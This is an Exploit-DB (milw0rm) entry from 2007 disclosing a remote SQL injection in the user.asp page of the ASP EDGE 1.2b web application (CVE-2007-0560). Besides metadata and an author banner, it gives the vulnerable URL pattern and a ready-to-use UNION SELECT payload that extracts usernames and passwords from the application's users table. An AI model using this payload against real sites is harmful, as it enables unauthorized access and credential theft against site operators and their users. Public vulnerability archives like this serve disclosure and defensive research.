ASP EDGE <= 1.2b user.asp Remote SQL Injection Vulnerability

2007-01-24T00:00:00
ID EDB-ID:3186
Type exploitdb
Reporter ajann
Modified 2007-01-24T00:00:00

Description

ASP EDGE <= 1.2b (user.asp) Remote SQL Injection Vulnerability. CVE-2007-0560. Webapps exploit for asp platform

                                        
                                            *******************************************************************************
# Title   :  ASP EDGE &lt;= V1.2b (user.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//user.asp?user=[SQL]

Example:

//user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-24]